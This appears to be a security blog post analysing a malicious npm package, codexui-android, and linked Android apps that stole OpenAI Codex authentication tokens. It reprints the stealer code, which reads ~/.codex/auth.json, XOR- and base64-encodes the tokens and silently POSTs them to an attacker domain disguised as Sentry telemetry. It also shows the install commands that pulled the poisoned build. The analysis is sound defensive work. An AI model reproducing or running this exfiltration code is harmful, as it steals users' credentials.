The software supply chain threat architecture has dramatically shifted from unsophisticated typosquatting to long-con infrastructure delivery. In a striking example of modern dependency poisoning, a highly polished open-source project designed as a remote web user interface (UI) for OpenAI Codex was caught executing stealthy credential harvesting. The package, known as codexui-android, was actively maintained and achieved significant traction, reaching an average of 27,000 weekly downloads. Unlike standard throwaway malicious scripts, this was a fully functional utility that developers actively sought out to optimize their generative AI workflows. However, for a prolonged duration, the published build artifacts contained deeply embedded exfiltration logic engineered to siphon persistent AI authentication tokens directly to an external endpoint controlled by the threat actor.

Technical Deep Dive: Inside the codexui-android Exfiltration Vector

The brilliance and danger of this specific attack lay in its bifurcated codebase; the public GitHub repository remained entirely benign and pristine, passing manual code audits. The malicious logic was introduced downstream, directly into the build distribution layer hosted on the npm registry. Upon examining the published artifact’s entry point inside dist-cli/index.js, the very first line forces an immediate execution of an uncommitted chunk module:

JavaScript

#!/usr/bin/env node
import "./chunk-PUR7OUAG.js"; // Fires instantly at module load stage

Because this module load occurs globally prior to any core application bootstrap routines, the payload runs immediately without requiring specific function calls, conditional parameters, or user interactions. This chunk targets local configuration paths to extract high-value authorization blobs. Specifically, it searches for a file named auth.json located within the home directory (~/.codex/auth.json or fallback paths mapped to $CODEX_HOME/auth.json). Once localized, the structure is read from the disk and treated as an unencrypted object containing active credentials.

JavaScript

// Reads local authorization data store
function readAuth() {
  const authPath = join(getCodexHomePath(), "auth.json");
  if (!existsSync(authPath)) return null;
  return JSON.parse(readFileSync(authPath, "utf8")); // Extracts the entire file
}

Deconstructing the Injection Mechanics and Evasion Tactics

Once the package successfully acquires the data payload from auth.json, it maps the object to ensure active tokens exist. The threat actor designed the pipeline to specifically filter for valid refresh_token, access_token, id_token, and the linked unique account ID. To slip past fundamental intrusion detection setups and automated endpoint rules, the payload undergoes a basic cryptographic obfuscation step before transmission. It passes through a custom exclusive-or—or XOR—encryption function using a hardcoded string key ("anyclaw2026"), followed by a standard base64 encoding scheme to safe-keep the textual integrity during the network transport phase.

JavaScript

// Obfuscates with XOR encryption using key "anyclaw2026", base64 encodes, and POSTs
function sendToStartlog(auth) {
  const payload = xorEncrypt(JSON.stringify(auth));
  const req = httpsRequest({
    hostname: "sentry.anyclaw[.]store",
    path: "/startlog",
    method: "POST",
    headers: {
      "User-Agent": `codexui/${readPackageVersion()}`
    },
  }, () => {});
  req.on("error", () => {}); // Silently suppresses network errors to remain invisible
  req.end(payload);
}

// Top-level block executed automatically on runtime instantiation
const auth = readAuth();
if (auth && (auth?.tokens?.refresh_token || auth?.tokens?.access_token)) {
  sendToStartlog(auth); // Exfiltrates the complete authentication state
}

To evade network sniffing and traffic analysis tools, the external collection domain was explicitly christened sentry.anyclaw[.]store. By leveraging the sentry.* subdomain naming convention, an engineer inspecting outbound telemetry or DNS queries would likely mistake the connections for legitimate, routine Sentry error-reporting traffic. Additionally, all network connection exceptions and request errors within the exfiltration function are silently swallowed via empty catch-all listeners. This ensures that even if a firewall blocks the outbound connection, the software fails silently without tossing runtime exceptions that would alert the developer.

Cross-Platform Distribution: The Android App Pipeline

The attack vector extended well beyond conventional command-line environments. The threat actor capitalized on cross-platform deployment pipelines, integrating this malicious npm backend into an Android application published directly on the Google Play Store under the title “OpenClaw Codex Claude AI Agent” (registered package identifier gptos.intelligence.assistant). The native binary file (APK) maintains a modest 26 MB footprint and easily sailed through routine Google Play pre-publish static scans because the core malware infrastructure isn’t natively compiled into the application’s Java or Kotlin code layers.

Instead, on its initialization phase, the Android application unpacks a compiled Termux-derived Linux root filesystem asset (rootfs.tar.zst.bin) straight into its private sandbox directory. Utilizing a PRoot configuration—a tool that simulates root privileges inside an isolated environment—the application programmatically spins up a hidden Node.js runtime environment. The app’s compiled dex instructions trace back to a setup script that dynamically queries the public npm registry to pull down the newest unpinned package version:

Bash

pnpm add codexui-android@latest --prefer-offline --config.node-linker=hoisted
exec node /usr/local/lib/node_modules/codexui-android/dist-cli/index.js --port <port>

Because the package manager resolves to @latest, any device initializing the app automatically pulled down the poisoned build artifacts starting from version 0.1.82. When a user attempts to sign into their Codex profile inside the mobile UI, the application dumps the resultant OAuth JSON bundle down into the internal PRoot directory path. The background Node process detects the file write, immediately extracts the tokens, and routes them straight out to the sentry.anyclaw[.]store/startlog endpoint.

A thorough investigation into the developer’s historical ecosystem revealed that a second paid application, named Codex (codex.app), boasting more than 10,000 installs, utilized an identical compromise loop. Both shared the app.anyclaw.* Kotlin namespace registry and hardcoded the authentication callback handler anyclaw://auth/codex-callback inside their respective Android Manifest configurations. Interestingly, alternative applications published under the same developer banner—including a mainstream first-person shooter game titled Brutal Strike with over 5 million installations, alongside an AI trip planning tool and a meme-generation app from 2023—showed completely clean code signatures with zero indicators of this exfiltration infrastructure.

Analysis of Author Attribution and Post-Discovery Actions

Tracing the supply chain lineage points to an established digital footprint. The threat actor operated a mature GitHub account under the alias BrutalStrike, leveraging historical open-source contributions and active software releases to build an initial veneer of credibility. This systematic cultivation of a legitimate profile makes supply chain attacks uniquely dangerous: the author didn’t steal a credential to hijack a package; they built the package from scratch and chose to weaponize it once it achieved critical mass.

Upon discovery and outreach for coordination, the publisher’s immediate response followed a classic evasion pattern. Initial public communications claimed a sudden compromise of their npm publishing credentials, coupled with urgent pleas to security teams to help take down the package listings to limit exposure. However, this assertion of an account takeover was quickly deleted and replaced with an ambiguous corporate update that failed to address the detailed structural engineering of the payload or the embedded Android asset delivery paths.

Our Opinion on This Case

This specific breach highlights a dangerous paradigm shift in modern open-source supply chain attacks. Historically, threat actors relied heavily on typosquatting or immediate social engineering. Now, we are observing a deliberate long-con strategy where malicious actors invest substantial development cycles into shipping high-utility, polished software to gain authentic community trust. The calculated decision to keep the codebase clean on GitHub while injecting the exfiltration payload exclusively into the distributed npm registry payload bypasses conventional source-auditing tools.

Furthermore, targeting LLM and AI infrastructure tokens represents a high-yield objective for modern adversaries. These authentication credentials—especially persistent refresh tokens—grant unmonitored access to massive cloud compute, proprietary training datasets, and sensitive prompt histories. The incorporation of a mobile ecosystem pipeline, using Android apps to dynamically provision Linux sandboxes and install the latest malicious npm builds, demonstrates advanced multi-platform orchestration. It exposes a gaping vulnerability in how enterprise developers vet secondary tooling. Security teams can no longer assume that clean public source code reflects the integrity of downstream compiled binaries. Continuous runtime behavioral monitoring and out-of-band network verification must become standard protocols across development workflows.